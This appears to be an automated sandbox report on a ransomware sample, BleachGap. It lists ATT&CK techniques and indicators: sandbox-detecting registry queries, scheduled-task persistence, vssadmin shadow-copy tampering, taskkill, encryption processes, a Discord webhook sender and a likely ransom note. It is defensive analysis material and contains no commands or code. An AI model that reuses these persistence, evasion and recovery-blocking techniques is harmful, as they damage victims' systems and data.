a84f1837031f236302dc335ea0d285e4c9e223631ae2702a0d6176a743018161

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\D:	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities	explorer.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
252	schtasks.exe
640	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchUI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchUI.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1128	vssadmin.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
388	taskkill.exe
3884	taskkill.exe
2272	taskkill.exe
2820	taskkill.exe

Modifies registry class 31 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana	SearchUI.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010005000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002c100000000000002000000e50702004100720067006a006200650078000a005600610067007200650061007200670020006e007000700072006600660000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000074ae2078e323294282c1e41cb67d5b9c0000000000000000000000009e1d2fea1e0dd70100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e50702004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000073ae2078e323294282c1e41cb67d5b9c00000000000000000000000076bb2fea1e0dd70100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b00360051003800300039003300370037002d0036004e00530030002d003400340034004f002d0038003900350037002d004e00330037003700330053003000320032003000300052007d005c004a0076006100710062006a0066002000510072007300720061007100720065005c005a0046004e00460050006800760059002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000000000000e4070a004e0070006700760062006100660020006100720072007100720071002e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000fffffffff9a6406d323dcb4f8a86be992e03dc760000000000000000000000005aa40d5557add60100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e4070a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e4070a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "132483827320340134"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56"	SearchUI.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchUI.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
5668	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 57 IoCs

pid	Process
1372	powershell.exe
1372	powershell.exe
1372	powershell.exe
2492	powershell.exe
2492	powershell.exe
2492	powershell.exe
2272	powershell.exe
2272	powershell.exe
2272	powershell.exe
184	powershell.exe
184	powershell.exe
184	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
4984	powershell.exe
4984	powershell.exe
4984	powershell.exe
4100	powershell.exe
4100	powershell.exe
4100	powershell.exe
3456	aescrypt.exe
3456	aescrypt.exe
3456	aescrypt.exe
3916	aescrypt.exe
3916	aescrypt.exe
3916	aescrypt.exe
2916	powershell.exe
2916	powershell.exe
2916	powershell.exe
5176	powershell.exe
5176	powershell.exe
5176	powershell.exe
5844	powershell.exe
5844	powershell.exe
5844	powershell.exe
5948	powershell.exe
5948	powershell.exe
5948	powershell.exe
6128	powershell.exe
6128	powershell.exe
6128	powershell.exe
3232	powershell.exe
3232	powershell.exe
3232	powershell.exe
6708	powershell.exe
6708	powershell.exe
6708	powershell.exe
6812	powershell.exe
6812	powershell.exe
6812	powershell.exe
6960	powershell.exe
6960	powershell.exe
6960	powershell.exe
4716	powershell.exe
4716	powershell.exe
4716	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	944	WMIC.exe
Token: SeSecurityPrivilege	944	WMIC.exe
Token: SeTakeOwnershipPrivilege	944	WMIC.exe
Token: SeLoadDriverPrivilege	944	WMIC.exe
Token: SeSystemProfilePrivilege	944	WMIC.exe
Token: SeSystemtimePrivilege	944	WMIC.exe
Token: SeProfSingleProcessPrivilege	944	WMIC.exe
Token: SeIncBasePriorityPrivilege	944	WMIC.exe
Token: SeCreatePagefilePrivilege	944	WMIC.exe
Token: SeBackupPrivilege	944	WMIC.exe
Token: SeRestorePrivilege	944	WMIC.exe
Token: SeShutdownPrivilege	944	WMIC.exe
Token: SeDebugPrivilege	944	WMIC.exe
Token: SeSystemEnvironmentPrivilege	944	WMIC.exe
Token: SeRemoteShutdownPrivilege	944	WMIC.exe
Token: SeUndockPrivilege	944	WMIC.exe
Token: SeManageVolumePrivilege	944	WMIC.exe
Token: 33	944	WMIC.exe
Token: 34	944	WMIC.exe
Token: 35	944	WMIC.exe
Token: 36	944	WMIC.exe
Token: SeIncreaseQuotaPrivilege	944	WMIC.exe
Token: SeSecurityPrivilege	944	WMIC.exe
Token: SeTakeOwnershipPrivilege	944	WMIC.exe
Token: SeLoadDriverPrivilege	944	WMIC.exe
Token: SeSystemProfilePrivilege	944	WMIC.exe
Token: SeSystemtimePrivilege	944	WMIC.exe
Token: SeProfSingleProcessPrivilege	944	WMIC.exe
Token: SeIncBasePriorityPrivilege	944	WMIC.exe
Token: SeCreatePagefilePrivilege	944	WMIC.exe
Token: SeBackupPrivilege	944	WMIC.exe
Token: SeRestorePrivilege	944	WMIC.exe
Token: SeShutdownPrivilege	944	WMIC.exe
Token: SeDebugPrivilege	944	WMIC.exe
Token: SeSystemEnvironmentPrivilege	944	WMIC.exe
Token: SeRemoteShutdownPrivilege	944	WMIC.exe
Token: SeUndockPrivilege	944	WMIC.exe
Token: SeManageVolumePrivilege	944	WMIC.exe
Token: 33	944	WMIC.exe
Token: 34	944	WMIC.exe
Token: 35	944	WMIC.exe
Token: 36	944	WMIC.exe
Token: SeBackupPrivilege	1056	vssvc.exe
Token: SeRestorePrivilege	1056	vssvc.exe
Token: SeAuditPrivilege	1056	vssvc.exe
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	388	taskkill.exe
Token: SeDebugPrivilege	3884	taskkill.exe
Token: SeDebugPrivilege	2272	taskkill.exe
Token: SeDebugPrivilege	2820	taskkill.exe
Token: SeDebugPrivilege	2492	powershell.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	184	powershell.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeDebugPrivilege	4100	powershell.exe
Token: SeShutdownPrivilege	5088	explorer.exe
Token: SeCreatePagefilePrivilege	5088	explorer.exe
Token: SeShutdownPrivilege	5088	explorer.exe
Token: SeCreatePagefilePrivilege	5088	explorer.exe
Token: SeShutdownPrivilege	5088	explorer.exe
Token: SeCreatePagefilePrivilege	5088	explorer.exe
Token: SeShutdownPrivilege	5088	explorer.exe
Token: SeCreatePagefilePrivilege	5088	explorer.exe

Suspicious use of FindShellTrayWindow 52 IoCs

pid	Process
2488	DiscordSendWebhook.exe
2488	DiscordSendWebhook.exe
2488	DiscordSendWebhook.exe
2488	DiscordSendWebhook.exe
2348	DiscordSendWebhook.exe
2348	DiscordSendWebhook.exe
2348	DiscordSendWebhook.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe

Suspicious use of SendNotifyMessage 31 IoCs

pid	Process
2488	DiscordSendWebhook.exe
2488	DiscordSendWebhook.exe
2488	DiscordSendWebhook.exe
2488	DiscordSendWebhook.exe
2348	DiscordSendWebhook.exe
2348	DiscordSendWebhook.exe
2348	DiscordSendWebhook.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4968	SearchUI.exe
3404	ShellExperienceHost.exe
3404	ShellExperienceHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1052 wrote to memory of 616	1052	BleachGap.bin.exe	76
PID 1052 wrote to memory of 616	1052	BleachGap.bin.exe	76
PID 616 wrote to memory of 944	616	cmd.exe	79
PID 616 wrote to memory of 944	616	cmd.exe	79
PID 616 wrote to memory of 1128	616	cmd.exe	82
PID 616 wrote to memory of 1128	616	cmd.exe	82
PID 616 wrote to memory of 3108	616	cmd.exe	83
PID 616 wrote to memory of 3108	616	cmd.exe	83
PID 616 wrote to memory of 2052	616	cmd.exe	84
PID 616 wrote to memory of 2052	616	cmd.exe	84
PID 616 wrote to memory of 516	616	cmd.exe	85
PID 616 wrote to memory of 516	616	cmd.exe	85
PID 616 wrote to memory of 740	616	cmd.exe	86
PID 616 wrote to memory of 740	616	cmd.exe	86
PID 616 wrote to memory of 640	616	cmd.exe	87
